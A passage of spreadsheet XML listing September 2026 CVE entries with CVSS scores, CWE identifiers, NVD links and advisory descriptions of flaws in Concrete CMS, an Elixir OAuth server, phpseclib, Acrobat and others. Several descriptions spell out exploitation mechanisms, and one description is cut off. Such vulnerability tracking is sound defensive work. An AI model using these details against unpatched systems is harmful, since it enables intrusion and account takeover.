        <v>0.003</v>
      </c>
      <c r="G4239" s="5" t="inlineStr"/>
      <c r="H4239" s="5" t="inlineStr"/>
      <c r="I4239" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4239" s="5" t="inlineStr"/>
      <c r="K4239" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L4239" s="5" t="inlineStr">
        <is>
          <t>An issue in the ugw-editfile method of /cgi-bin/wwwugw.cgi in MBS-Solutions X-Serie Gateway firmware V6_00_05 allows a remote authenticated user with the low-privileged Standard role to write arbitrary content to files within /uxx/config/ and /ugw/config/.</t>
        </is>
      </c>
      <c r="M4239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75168</t>
        </is>
      </c>
    </row>
    <row r="4240">
      <c r="A4240" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77697</t>
        </is>
      </c>
      <c r="C4240" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4240" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4240" s="5" t="inlineStr"/>
      <c r="F4240" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4240" s="5" t="inlineStr"/>
      <c r="H4240" s="5" t="inlineStr"/>
      <c r="I4240" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4240" s="5" t="inlineStr"/>
      <c r="K4240" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L4240" s="5" t="inlineStr">
        <is>
          <t>Zohocorp ManageEngine Endpoint Central versions below 11.4.2540.23 are vulnerable to Privilege Escalation During JAR Extraction</t>
        </is>
      </c>
      <c r="M4240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77697</t>
        </is>
      </c>
    </row>
    <row r="4241">
      <c r="A4241" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79973</t>
        </is>
      </c>
      <c r="C4241" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4241" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4241" s="5" t="inlineStr"/>
      <c r="F4241" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4241" s="5" t="inlineStr"/>
      <c r="H4241" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I4241" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4241" s="5" t="inlineStr"/>
      <c r="K4241" s="5" t="inlineStr">
        <is>
          <t>CWE-567</t>
        </is>
      </c>
      <c r="L4241" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Unsynchronized Access to Shared Data in a Multithreaded Context vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to denial of service.</t>
        </is>
      </c>
      <c r="M4241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79973</t>
        </is>
      </c>
    </row>
    <row r="4242">
      <c r="A4242" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81788</t>
        </is>
      </c>
      <c r="C4242" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4242" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4242" s="5" t="inlineStr"/>
      <c r="F4242" s="5" t="inlineStr"/>
      <c r="G4242" s="5" t="inlineStr"/>
      <c r="H4242" s="5" t="inlineStr"/>
      <c r="I4242" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4242" s="5" t="inlineStr"/>
      <c r="K4242" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4242" s="5" t="inlineStr">
        <is>
          <t>Subscriber Broken Access Control in IMPress for IDX Broker &lt;= 3.3.0 versions.</t>
        </is>
      </c>
      <c r="M4242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81788</t>
        </is>
      </c>
    </row>
    <row r="4243">
      <c r="A4243" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81824</t>
        </is>
      </c>
      <c r="C4243" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4243" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4243" s="5" t="inlineStr"/>
      <c r="F4243" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4243" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4243" s="5" t="inlineStr"/>
      <c r="I4243" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4243" s="5" t="inlineStr"/>
      <c r="K4243" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4243" s="5" t="inlineStr">
        <is>
          <t>The vulnerability, if exploited, could allow a miscreant to run arbitrary JavaScript code in a browser session of a PIMBoards user who was socially engineered to click on a malicious link.</t>
        </is>
      </c>
      <c r="M4243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81824</t>
        </is>
      </c>
    </row>
    <row r="4244">
      <c r="A4244" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81904</t>
        </is>
      </c>
      <c r="C4244" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4244" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4244" s="5" t="inlineStr"/>
      <c r="F4244" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4244" s="5" t="inlineStr"/>
      <c r="H4244" s="5" t="inlineStr"/>
      <c r="I4244" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4244" s="5" t="inlineStr"/>
      <c r="K4244" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4244" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS below 9.5.3 registered view assets for every sub-block of a Stack, Container, or layout area without checking whether the requesting user could view that sub-block. An unauthenticated visitor could recover configuration values emitted by a restricted sub-block's asset registration — such as a site's configured Google Maps API key — from any public page embedding an affected Stack, Container, or layout area, despite the block-level permission restriction. Any sub-block type whose asset or header hooks output configuration values is affected.  The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting.</t>
        </is>
      </c>
      <c r="M4244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81904</t>
        </is>
      </c>
    </row>
    <row r="4245">
      <c r="A4245" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81905</t>
        </is>
      </c>
      <c r="C4245" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4245" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4245" s="5" t="inlineStr"/>
      <c r="F4245" s="5" t="inlineStr"/>
      <c r="G4245" s="5" t="inlineStr"/>
      <c r="H4245" s="5" t="inlineStr"/>
      <c r="I4245" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J4245" s="5" t="inlineStr"/>
      <c r="K4245" s="5" t="inlineStr">
        <is>
          <t>CWE-640, CWE-863</t>
        </is>
      </c>
      <c r="L4245" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS below 9.5.3 stores user validation hashes for multiple purposes (email/registration validation, password reset, and persistent login) in a single table with a type column, but the redemption path resolves a hash by value alone and does not verify its type. As a result, a hash issued for one purpose can be redeemed for another: a long-lived registration hash (60-day expiry) can be submitted to the password-change endpoint to set a new password on the target account, and a password-reset hash can be submitted to the email-validation endpoint to activate an account. Exploitation requires the attacker to first obtain a valid hash through a separate channel (for example email interception, log exposure, or SSRF against an internal mail relay), so the flaw amplifies the impact of any hash disclosure rather than creating a standalone entry point. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori from Tenzai for reporting.</t>
        </is>
      </c>
      <c r="M4245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81905</t>
        </is>
      </c>
    </row>
    <row r="4246">
      <c r="A4246" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81906</t>
        </is>
      </c>
      <c r="C4246" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4246" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4246" s="5" t="inlineStr"/>
      <c r="F4246" s="5" t="inlineStr"/>
      <c r="G4246" s="5" t="inlineStr"/>
      <c r="H4246" s="5" t="inlineStr"/>
      <c r="I4246" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J4246" s="5" t="inlineStr"/>
      <c r="K4246" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L4246" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS OAuth callback login path prior to version 9.5.3 did not check whether an account was active or email-validated before establishing a session. A deactivated or unvalidated user with an existing OAuth binding could complete authentication and receive a session that was fully authenticated for the callback response, with the login recorded and login events dispatched. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori from Tenzai for reporting.</t>
        </is>
      </c>
      <c r="M4246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81906</t>
        </is>
      </c>
    </row>
    <row r="4247">
      <c r="A4247" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81994</t>
        </is>
      </c>
      <c r="C4247" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4247" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4247" s="5" t="inlineStr"/>
      <c r="F4247" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4247" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H4247" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I4247" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4247" s="5" t="inlineStr"/>
      <c r="K4247" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L4247" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files and directories outside the intended access scope. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed.</t>
        </is>
      </c>
      <c r="M4247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81994</t>
        </is>
      </c>
    </row>
    <row r="4248">
      <c r="A4248" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81997</t>
        </is>
      </c>
      <c r="C4248" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4248" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4248" s="5" t="inlineStr"/>
      <c r="F4248" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4248" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H4248" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I4248" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4248" s="5" t="inlineStr"/>
      <c r="K4248" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4248" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized write access. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed.</t>
        </is>
      </c>
      <c r="M4248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81997</t>
        </is>
      </c>
    </row>
    <row r="4249">
      <c r="A4249" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82729</t>
        </is>
      </c>
      <c r="C4249" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4249" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4249" s="5" t="inlineStr"/>
      <c r="F4249" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4249" s="5" t="inlineStr"/>
      <c r="H4249" s="5" t="inlineStr"/>
      <c r="I4249" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4249" s="5" t="inlineStr"/>
      <c r="K4249" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L4249" s="5" t="inlineStr">
        <is>
          <t>Inefficient Algorithmic Complexity vulnerability in elixir-mint mint allows a remote HTTP server to exhaust CPU on the client host and cause a denial of service.
parse_hex_prefix/2 in lib/mint/http1/parse.ex folds each hex digit of a chunked response's chunk-size field into an arbitrary-precision accumulator with acc * 16 + digit and imposes no limit on the digit count. Because the accumulator grows without bound, the multiplication is not constant time and one pass over N digits costs O(N squared). handle_data/2 prepends conn.buffer and re-parses from the start on every socket message, so a server that dribbles the digits out in small packets makes the client pay that cost repeatedly. A run of roughly 512,000 hex digits costs over ten seconds of CPU in a single pass, measured on stock defaults. The parser reaches this state after a valid status line and a complete, valid header section, so an intermediary inspecting only headers sees an ordinary 200 response.
This issue affects mint: from 1.9.3 before 1.10.0.</t>
        </is>
      </c>
      <c r="M4249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82729</t>
        </is>
      </c>
    </row>
    <row r="4250">
      <c r="A4250" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82754</t>
        </is>
      </c>
      <c r="C4250" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4250" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4250" s="5" t="inlineStr"/>
      <c r="F4250" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4250" s="5" t="inlineStr"/>
      <c r="H4250" s="5" t="inlineStr"/>
      <c r="I4250" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4250" s="5" t="inlineStr"/>
      <c r="K4250" s="5" t="inlineStr">
        <is>
          <t>CWE-424</t>
        </is>
      </c>
      <c r="L4250" s="5" t="inlineStr">
        <is>
          <t>Improper Protection of Alternate Path vulnerability in ash-project ash_authentication_oauth2_server exposes the state-changing OAuth endpoints under an unintended URL prefix, bypassing controls scoped to the canonical prefix.
oauth2_server_protocol_routes/1 in AshAuthentication.Phoenix.Oauth2Server.Router forwards the same ProtocolRouter at both the /oauth prefix and the /.well-known prefix. Phoenix forward strips the matched prefix before dispatch, so the full route table answers under both mounts, and POST /register, POST /token, and POST /revoke are reachable as /.well-known/register, /.well-known/token, and /.well-known/revoke. Edge controls such as WAF rules, rate limits, or authentication exemptions written against the /oauth paths, or that allow-list /.well-known as unauthenticated, do not apply to the alias.
This issue affects ash_authentication_oauth2_server: from 0.1.0 before 0.3.1.</t>
        </is>
      </c>
      <c r="M4250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82754</t>
        </is>
      </c>
    </row>
    <row r="4251">
      <c r="A4251" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82755</t>
        </is>
      </c>
      <c r="C4251" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4251" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4251" s="5" t="inlineStr"/>
      <c r="F4251" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4251" s="5" t="inlineStr"/>
      <c r="H4251" s="5" t="inlineStr"/>
      <c r="I4251" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4251" s="5" t="inlineStr"/>
      <c r="K4251" s="5" t="inlineStr">
        <is>
          <t>CWE-524</t>
        </is>
      </c>
      <c r="L4251" s="5" t="inlineStr">
        <is>
          <t>Use of Cache Containing Sensitive Information vulnerability in ash-project ash_authentication_oauth2_server allows a shared HTTP cache to serve one tenant's OAuth discovery metadata to another tenant's clients.
The RFC 8414 and RFC 9728 metadata endpoints in AshAuthentication.Phoenix.Oauth2Server.ProtocolRouter return tenant-specific values (issuer, authorization_endpoint, token_endpoint, jwks_uri) when a tenant is set, but sent them with Cache-Control: public, max-age=3600 and no Vary. When the tenant is derived from something other than the URL (a header or the Host) and a shared cache sits in front, the cache key is the URL alone, so a stored response for one tenant is served to another for up to an hour. Affected clients may then send authorization codes and secrets to the wrong tenant's token endpoint and validate tokens against the wrong keys.
This issue affects ash_authentication_oauth2_server: from 0.1.3 before 0.3.1.</t>
        </is>
      </c>
      <c r="M4251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82755</t>
        </is>
      </c>
    </row>
    <row r="4252">
      <c r="A4252" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82756</t>
        </is>
      </c>
      <c r="C4252" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4252" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4252" s="5" t="inlineStr"/>
      <c r="F4252" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4252" s="5" t="inlineStr"/>
      <c r="H4252" s="5" t="inlineStr"/>
      <c r="I4252" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4252" s="5" t="inlineStr"/>
      <c r="K4252" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="L4252" s="5" t="inlineStr">
        <is>
          <t>Improper Encoding or Escaping of Output vulnerability in ash-project ash_authentication_oauth2_server allows an unauthenticated attacker to inject arbitrary authentication parameters into the WWW-Authenticate challenge header.
BearerPlug and RequireScopePlug built the Bearer resource_metadata="..." challenge by interpolating a resource_metadata URL derived from the request tenant directly into the quoted value. In a multi-tenant application that sets the Ash tenant from request-controlled data (a subdomain, the Host, a path segment, or a header), a tenant containing a " closes the quoted value and appends attacker-chosen auth-params, including a second resource_metadata URL pointing at an attacker-controlled authorization server that spec-following clients follow. Carriage returns and line feeds are rejected by Plug, so this is parameter injection within one header, not response splitting.
This issue affects ash_authentication_oauth2_server: from 0.1.3 before 0.3.1.</t>
        </is>
      </c>
      <c r="M4252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82756</t>
        </is>
      </c>
    </row>
    <row r="4253">
      <c r="A4253" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82757</t>
        </is>
      </c>
      <c r="C4253" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4253" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4253" s="5" t="inlineStr"/>
      <c r="F4253" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4253" s="5" t="inlineStr"/>
      <c r="H4253" s="5" t="inlineStr"/>
      <c r="I4253" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4253" s="5" t="inlineStr"/>
      <c r="K4253" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L4253" s="5" t="inlineStr">
        <is>
          <t>Server-Side Request Forgery (SSRF) vulnerability in ash-project ash_authentication_oauth2_server allows an attacker who controls a client metadata URL and its DNS to make the server connect to internal or loopback addresses.
public_ip?/1 in AshAuthentication.Oauth2Server.CIMD.ReqFetcher enforces the outbound policy for CIMD metadata fetches. It classified several address forms as publicly routable that are not: IPv4-compatible ::/96 (for example ::127.0.0.1), SIIT IPv4-translated ::ffff:0:0:0/96, and deprecated site-local fec0::/10. A returned AAAA record in one of these ranges passed the policy, so a fetch pinned to that address reached space the policy was meant to block.
This issue affects ash_authentication_oauth2_server: from 0.3.0 before 0.3.1.</t>
        </is>
      </c>
      <c r="M4253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82757</t>
        </is>
      </c>
    </row>
    <row r="4254">
      <c r="A4254" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82758</t>
        </is>
      </c>
      <c r="C4254" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4254" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4254" s="5" t="inlineStr"/>
      <c r="F4254" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4254" s="5" t="inlineStr"/>
      <c r="H4254" s="5" t="inlineStr"/>
      <c r="I4254" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4254" s="5" t="inlineStr"/>
      <c r="K4254" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L4254" s="5" t="inlineStr">
        <is>
          <t>Improper Authentication vulnerability in ash-project ash_authentication_oauth2_server allows an unauthenticated attacker to register OAuth clients even when Dynamic Client Registration is gated by an initial access token.
resolve_secret/3 in AshAuthentication.Oauth2Server (reached through __resolve_secret__!) treated any return other than {:ok, _} or :error from a configured {module, function, args} or 2-arity-function secret provider as a valid secret, wrapping nil, false, or "" as {:ok, value}. When the initial_access_token resolves to such an empty value, POST /oauth/register compares the presented bearer token against it and the comparison passes with no token supplied, so registration is open although it was configured closed. The same fail-open affected other resolved secrets such as signing_secret.
This issue affects ash_authentication_oauth2_server: from 0.1.0 before 0.3.1.</t>
        </is>
      </c>
      <c r="M4254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82758</t>
        </is>
      </c>
    </row>
    <row r="4255">
      <c r="A4255" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83610</t>
        </is>
      </c>
      <c r="C4255" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4255" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4255" s="5" t="inlineStr"/>
      <c r="F4255" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4255" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4255" s="5" t="inlineStr"/>
      <c r="I4255" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J4255" s="5" t="inlineStr"/>
      <c r="K4255" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="L4255" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.15 and 0.9.12, and in xmldom version 0.6.0 and earlier, Document.createEntityReference(name) accepts an invalid name and the ENTITY_REFERENCE_NODE serializer emits the resulting nodeName directly in &amp;name; form. Directly serializing the node or fragment with XMLSerializer.serializeToString() and requireWellFormed: true can therefore break the entity-reference boundary and produce attacker-controlled XML markup when reparsed. The parser does not ordinarily create these nodes, and element-child insertion is rejected, so exploitation requires an application to create and directly serialize an EntityReference. This issue is fixed in @xmldom/xmldom versions 0.8.15 and 0.9.12; no fixed version is available for xmldom.</t>
        </is>
      </c>
      <c r="M4255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83610</t>
        </is>
      </c>
    </row>
    <row r="4256">
      <c r="A4256" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84303</t>
        </is>
      </c>
      <c r="C4256" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4256" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4256" s="5" t="inlineStr"/>
      <c r="F4256" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4256" s="5" t="inlineStr"/>
      <c r="H4256" s="5" t="inlineStr"/>
      <c r="I4256" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J4256" s="5" t="inlineStr"/>
      <c r="K4256" s="5" t="inlineStr">
        <is>
          <t>CWE-178, CWE-863</t>
        </is>
      </c>
      <c r="L4256" s="5" t="inlineStr">
        <is>
          <t>gRPC-Go is</t>
        </is>
      </c>
      <c r="M4256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84303</t>
        </is>
      </c>
    </row>
    <row r="4257">
      <c r="A4257" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84308</t>
        </is>
      </c>
      <c r="C4257" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4257" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4257" s="5" t="inlineStr"/>
      <c r="F4257" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4257" s="5" t="inlineStr"/>
      <c r="H4257" s="5" t="inlineStr"/>
      <c r="I4257" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J4257" s="5" t="inlineStr"/>
      <c r="K4257" s="5" t="inlineStr">
        <is>
          <t>CWE-208, CWE-385</t>
        </is>
      </c>
      <c r="L4257" s="5" t="inlineStr">
        <is>
          <t>phpseclib is a PHP secure communications library. Prior to 3.0.57 and 4.0.1, pure-PHP X25519 scalar multiplication in phpseclib/Math/PrimeField/Integer.php performs data-dependent conditional modular reductions in add() and subtract(). During the Montgomery ladder in phpseclib/Crypt/EC/BaseCurves/Montgomery.php, the reduction behavior of each step depends on the secret scalar prefix, creating per-step timing and libgmp call-count observations that can reveal a reused 251-bit clamped private scalar. The phpseclib/Crypt/EC/Formats/Keys/MontgomeryPrivate.php derivation path invokes the pure-PHP multiplication without a native-engine check, while phpseclib/Crypt/EC/Formats/Keys/PKCS8.php reaches it when ext-sodium is unavailable. Exploitation requires a reused or long-lived X25519 private key, knowledge of the corresponding public key, execution of the pure-PHP path, and a local observer capable of resolving individual ladder steps or libgmp entry-point calls. Ephemeral X25519 keys, including phpseclib's normal SSH exchange path, are not affected. Recovery of the scalar permanently compromises operations that reuse that key. This issue is fixed in versions 3.0.57 and 4.0.1.</t>
        </is>
      </c>
      <c r="M4257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84308</t>
        </is>
      </c>
    </row>
    <row r="4258">
      <c r="A4258" s="5" t="inlineStr">
        <is>
